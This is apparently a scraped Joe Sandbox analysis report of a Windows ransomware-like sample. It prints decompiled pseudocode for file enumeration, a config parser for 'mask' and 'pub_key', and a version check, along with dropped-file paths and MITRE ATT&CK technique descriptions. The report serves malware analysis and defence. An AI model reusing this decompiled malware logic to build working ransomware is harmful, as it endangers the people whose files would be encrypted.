				 *((intOrPtr*)(__ecx + 0x80)) = _a84;
				 *(__ecx + 0x88) = L"ip";
				 *((intOrPtr*)(_t44 + 0x8c)) = GetProcessHeap();
				return _t44;
			}

APIs

GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C

Strings

d@, xrefs: 00403A0B
|@, xrefs: 004039FD
T@, xrefs: 00403A12
0@, xrefs: 00403A20
t@, xrefs: 00403A04
@@, xrefs: 00403A19

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID: 0@$@@$T@$d@$t@$|@
API String ID: 54951025-2847450446
Opcode ID: 9fc73a0d6419aa769ded072bd8f0af5eaef3b33f8b2fda6b5b6c05d8156f3e3f
Instruction ID: 81848ed92efb6c47f2188ed1792c8f7cddf9ec8f0008dcc1071cc611d3409556
Opcode Fuzzy Hash: 9fc73a0d6419aa769ded072bd8f0af5eaef3b33f8b2fda6b5b6c05d8156f3e3f
Instruction Fuzzy Hash: D5114EB4501B448FC7A0CF6AC58468ABFF0BB08718B409D2EE99A97B50D3B5B458CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406769 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00406769() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E004063B0(_t46, _t51 - 0x264, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if( *((intOrPtr*)(_t51 - 0xc)) <  *_t38) {
										goto L8;
									}
								}
							}
						} else {
							E004066F0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

APIs

lstrcmpW.KERNEL32(?,00410368,?,?), ref: 0040677C
lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406796
lstrcatW.KERNEL32(00000000,?), ref: 004067A8
lstrcatW.KERNEL32(00000000,0041039C), ref: 004067B9

Part of subcall function 004066F0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
Part of subcall function 004066F0: lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
Part of subcall function 004066F0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0040681D
FindClose.KERNEL32(00003000,?,?), ref: 0040682E

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: 2681e2e019e2eb95221ac8e5d6fef7f6142544138e274b8588e706dd0773f05b
Instruction ID: 9b87114a5c2e2fa11aec6284b95cd243dd4daa46cd42d80c1a26711d7dff17e5
Opcode Fuzzy Hash: 2681e2e019e2eb95221ac8e5d6fef7f6142544138e274b8588e706dd0773f05b
Instruction Fuzzy Hash: 6F012D31A0021DABDF21AB60DC48BEE7BB8EF44704F0444B6F806E61A1D7798A91CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00403190 Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403190(char _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t1 =  &_a4; // 0x405135
				_t13 =  *_t1;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t2 =  &_a4; // 0x405135
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA( *_t2, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

APIs

lstrcmpiA.KERNEL32(5Q@,mask,5Q@,?,?,00403441,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 004031B9
lstrcmpiA.KERNEL32(5Q@,pub_key,?,00403441,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 004031D1

Strings

pub_key, xrefs: 004031BF
5Q@, xrefs: 004031B0
5Q@, xrefs: 00403193, 004031C4, 004031B6
mask, xrefs: 004031B1

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: 5Q@$5Q@$mask$pub_key
API String ID: 1586166983-363831109
Opcode ID: bb2af6430398937933059d9a79bd65117c4dfe7bbf55f0997fe80ddbfe01824b
Instruction ID: 77421031a41d7d6ff0c7d7d831153f50eac579c1ccc453c74b5f930fdf35060a
Opcode Fuzzy Hash: bb2af6430398937933059d9a79bd65117c4dfe7bbf55f0997fe80ddbfe01824b
Instruction Fuzzy Hash: 09F0F6713082845EF7194E689C41BA3BFCD9B59311F5805BFE689E62D1C6BD8D81839C

Uniqueness

Uniqueness Score: -1.00%

Function 00403AE0 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00403B32
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: 7cde68c66f9c015681154b08be74a03bb432d34b9aa19d53ad58b75a9a878dd1
Instruction ID: 675139515f83daa62978cf2687ed4dcf32745b37c88ce0392e5ff862a27301cc
Opcode Fuzzy Hash: 7cde68c66f9c015681154b08be74a03bb432d34b9aa19d53ad58b75a9a878dd1
Instruction Fuzzy Hash: 83111EB0D4031C6EEB609B65DC0ABEA7ABCEF08704F008199A548F61C1D6B95B948FD5

Uniqueness

Uniqueness Score: -1.00%

Function 00404BA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00404BA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0x40ff2c]");
				_t16 =  *0x40ff34; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

APIs

lstrcpyA.KERNEL32(?,fabian wosar <3,?,00404E7E), ref: 00404C0D
lstrlenA.KERNEL32(00000000,?,00404E7E), ref: 00404C67
lstrcpyA.KERNEL32(?,?,?,00404E7E), ref: 00404C98

Strings

fabian wosar <3, xrefs: 00404C05

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: a904c25ae265fe742736e648722e0dad384a46136875b74b9355d29ccf0e1a05
Instruction ID: 61f71b58efb5150348b69fdc6af893256ae21e9068894ab04c691d9c03621922
Opcode Fuzzy Hash: a904c25ae265fe742736e648722e0dad384a46136875b74b9355d29ccf0e1a05
Instruction Fuzzy Hash: CE3128A180E1955BEB328E6844143BBBFA19FC3301F1A01BBCAD1B7386D2394C46C798

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9gkAKTWOXp.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a

C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Windows Analysis Report
9gkAKTWOXp.exe

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre